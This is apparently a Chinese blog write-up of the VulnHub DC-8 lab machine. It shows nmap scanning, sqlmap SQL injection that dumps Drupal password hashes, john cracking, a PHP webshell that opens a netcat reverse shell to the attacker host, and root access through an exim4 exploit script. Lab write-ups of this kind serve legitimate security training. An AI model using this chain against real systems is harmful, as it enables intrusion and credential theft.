DC8_靶场训练

最新推荐文章于 2024-08-19 11:43:09 发布
最新推荐文章于 2024-08-19 11:43:09 发布
阅读量1k 收藏 2
点赞数 2
文章标签: 安全漏洞 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JSH_CDX/article/details/105230289
版权

一.环境介绍

虚拟机平台:VMware Workstation Pro

攻击机:Kali2017(IP:10.10.10.133)

靶机:DC-8(IP:10.10.10.132)

二.信息收集

扫描所在局域网内存活的主机

netdiscover -r 10.10.10.0/24  //后面接要扫描的ip网段

在这里插入图片描述这里探测到的10.10.10.132即为DC8靶机的ip地址,接下来使用nmap扫描主机,查看端口和服务,发现目标主机开放了22和80端口

nmap -sS -A -p- -T4 10.10.10.132

在这里插入图片描述

三.漏洞挖掘与利用

直接访问主机ip地址,默认访问80端口,在欢迎页发现疑似注入点
在这里插入图片描述对疑似注入点进行手动测试,1后面加一个单引号,根据报错信息发现存在SQL注入点在这里插入图片描述
接下来使用SQLmap进行自动化注入

sqlmap -u "http://10.10.10.132/?nid=1%27" --dbs
sqlmap -u "http://10.10.10.132/?nid=1%27" --dbs -D d7db --tables
sqlmap -u "http://10.10.10.132/?nid=1%27" --dbs -D d7db -T users --columns
sqlmap -u "http://10.10.10.132/?nid=1%27" --dbs -D d7db -T users -C "uid,name,pass" --dump

爆数据库
在这里插入图片描述爆数据表
在这里插入图片描述查找有用数据表
在这里插入图片描述
爆字段
在这里插入图片描述拖裤
在这里插入图片描述得到账号密码,但是被加密了
在这里插入图片描述先把账号密码复制在DC8_password.txt里,然后用john爆破

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF 
//以上为文档里的内容,注意不能多出空格

john DC8_password.txt  //用john爆破密码

账号:john
密码:turtle

在网站上找不到登录的地方,我们可以扫描网站目录

dirb http://10.10.10.132

在这里插入图片描述
这里只爆破出了john的密码,可用来登录网站后台,接下来的思路就和DC7一样,需要反弹shell。

在这里插入图片描述
这里可能会想和DC7一样通过Add content–>Basic page去添加一个webshell,但是在这个靶机里面我们是通过Add content–>Webform–>From settings去添加webshell的,注意选择PHP code

<?php system("nc -e /bin/sh 10.10.10.133 4444");?>

在这里插入图片描述这里php代码前最好有一些其他内容,避免一些未知错误,写好shell后点击保存配置,回到view里填写自定义内容并提交,提交后便执行了刚刚的webshell,在提交前先在kali监听端口
在这里插入图片描述

nv -lvvp 4444 监听4444端口
python -c "import pty;pty.spawn('/bin/bash')" 得到交互式shell

在这里插入图片描述

四. 提权

接着查看哪些命令是root权限

find / -perm -4000 2>/dev/null

在这里插入图片描述发现exim4 ,查看对应版本信息

exim4 --version

在这里插入图片描述利用exim4提权,提权需要有写权限,www-data用户在当前目录下无写权限,查看目录权限发现/tmp目录有写入权限,切换到/tmp目录

ls -l

在这里插入图片描述接下来在kali上查找exim的漏洞攻击脚本,找到46996.sh脚本文件,这里kali2017找不到对应版本,可能是还没更新,所以我用kali2019找到对应版本漏洞攻击脚本,复制到根目录下再把脚本移入kali2017继续操作。
在这里插入图片描述查看脚本发现有两种执行方式

cat DC8_getshell.sh //查看脚本
./DC8_getshell.sh -m setuid //方式一执行脚本
./DC8_getshell.sh -m netcat //方式二执行脚本

在这里插入图片描述在kali上用vi查看编辑脚本文件类型,会出现 dos或unix格式,如果为dos,需要改为unix模式,不然会报错,这个报错是由于windows下编辑上传到linux下执行导致的

vi DC8_getshell.sh //编辑查看脚本
:set ff? //查看文件类型
:set ff=unix //修改文件为unix格式

在这里插入图片描述
在这里插入图片描述在kali上开启http服务给靶机下载exim漏洞脚本,记得在/tmp目录下下载脚本文件,并且修改脚本的权限,接着尝试两种方式执行脚本,方式二成功。

python -m SimpleHTTPServer //开启http服务
wget http://10.10.10.132:8000/DC8_getshell.sh //下载脚本到当前目录下,所以要进入有写入权限的/tmp目录下执行命令
chmod 777 getshell.sh //修改文件的权限

在这里插入图片描述方式一不成功
在这里插入图片描述方式二成功拿到root
在这里插入图片描述拿下flag
在这里插入图片描述至此,DC8就已经结束啦,谢谢您能坚持看到这里。

JSH_CDX
关注
DC-8靶场
qq_49518993的博客
08-27 920
DC-8靶场
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 633
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
DC-8 靶场夺旗
猎荒者
03-02 671
当你凝视深远的时候,深渊也凝视着你 环境准备 Kali(IP:10.10.16.128) DC-8 虚拟机 NAT 网络连接 主机发现 nmap -sP 10.10.16.0/24 端口扫描 nmap -A -v -sS -sV -p- -T4 10.10.16.145 目录爆破 dirb http://10.10.16.145 发现一个 robots.txt 文件 访问 rob...
DC系列靶场渗透测试流程总结
最新发布
zhouA0221的博客
08-19 1296
因此产生了两种格式文件相互转换的需求,对应的将UNIX格式文本文件转成成DOS格式的是unix2dos命令。先利用openssl命令创建一个密码,得到hash密码我们切换到tmp目录下,新建一个文件再回到/opt/devstuff/dist/test目录,执行程序test,将xiao的文件内容写入到/etc/passwd文件里面可以看到xiaofeixia用户已经添加到/etc/passwd文件里了,接下来然后使用命令su - xiao切换到我们添加的xiao用户,输入之前设置好密码即可登录.
靶场练习第十六天~vulnhub靶场之dc-8
qq_57976347的博客
02-15 408
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-8.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.121 2.网站的信息收集 (1)靶机开放了80端口,先访问
【DC-8靶场渗透】
一纸荒芜的博客
08-13 2120
dc-8靶场
dc-2靶场练习
qq_49518993的博客
09-27 556
dc-2靶场练习
DC系列漏洞靶场-渗透测试学习复现(DC-7)
W983079520的博客
12-10 1860
DC-7是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权和shell二次反弹。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-7靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默
pikachu + dvwa
09-22
这两个工具常用于网络安全教育和训练,帮助用户了解并防御常见的Web应用漏洞。 Pikachu是一款针对初学者的安全训练平台,它模拟了一系列真实的网络攻防场景,涵盖了SQL注入、XSS攻击、CSRF(跨站请求伪造)等多种...
网安学习日志 XSS靶机训练(xss-labs-master)(1-10)
qq_41819426的博客
01-19 5134
1.第一关 页面中我们并没有看到输入框,但是我们看到url中可以进行name值的修改。 看起来应该没有任何的过滤,我们直接输入语句尝试: <script>alert(1)</script> 这里还可以用很多方法,以下列举一些常用的方法: <input type=“text” onmouseover=alert(1)> <a href="javascript:alert(1)">a</a> <a onmouseover=“javasc
DC-8靶场实战
qq_42754807的博客
03-21 807
DC-9靶场实战
vulnhub DC8 靶场练习
鸥鹭忘机
09-03 1131
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第8台,下载地址为https://www.vulnhub.com/entry/dc-8,367/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的总体难度不大,利用的漏洞也是常见的,只要细心观察就可以发现这个突破口。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。
DC系列靶场---DC 8靶场的渗透测试
zhouA0221的博客
08-09 1047
Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。nid=3,问号传参,这种URL极有可能存在SQL注入漏洞。初步验证是否有SQL注入漏洞,直接在URL后边加个 ‘ 如果报错那就是被系统执行了,没有进行过滤。5、拿到shell后进行信息收集,Exim这个程序然后搜索这个程序的漏洞。2、通过这个URL加'看看是否报错,如果报错就是被系统执行了,那就是存在。3、拿到用户名和密码之后使用john进行爆破密码,爆出密码后登录到后台。
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 3951
dc-8靶场详细渗透过程
DC-8 靶机
日常打一些漏洞靶机
07-29 397
根据对比可知DC-8的一个ip地址为192.168.47.133。经过测试发现正确的账户名和密码为john和turtle。选择一个不需要root用户权限的目录,比如tmp。可得出一个叫turtle的密码。ps:如果出现下述情况可输入。出现robots.txt文件。发现存在用户登录的一个界面。选择使用46996.sh。出现root说明提权成功。发现一个比较奇怪的命令。
记录一次vulnhub靶场——DC8的渗透测试过程
旺仔Sec&blog
03-10 836
第一个命令 find / -perm -u=s -type f 2>/dev/null 使用 -perm -u=s 来查找具有 SUID 权限设置的文件,而第二个命令 find / -user root -perm -4000 -print 2>/dev/null 使用 -user root -perm -4000 来查找属主为 root 并且具有 SUID 权限设置的文件。,使用御剑扫描出robots.txt,并发现后台管理员登录的地址,使用john用户名与爆破出的密码成功登录后台。
Vulhub-DC-8靶场实战攻略
weixin_51339377的博客
03-17 998
测试网页中的Details 发现可以通过Get传参数 加上单引号以后出现报错 说明存在SQL注入的漏洞 通过sqlmap进行尝试 sqlmap -uhttp://192.168.206.142/?nid=1 -D d7db --tables sqlmap -u http://192.168.206.142/?nid=1 -D d7db -T users --columns sqlmap -u http://192.168.206.142...
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3077
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
DC-1靶场攻防:信息收集与Drupal漏洞挖掘
"DC-1靶场的攻防演练教程" 在网络安全领域,靶场是进行安全测试和技能提升的重要平台。本教程聚焦于名为DC-1的靶机,通过一系列步骤来展示如何找到并利用靶机上的漏洞来获取flag。下面我们将详细探讨这个过程。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值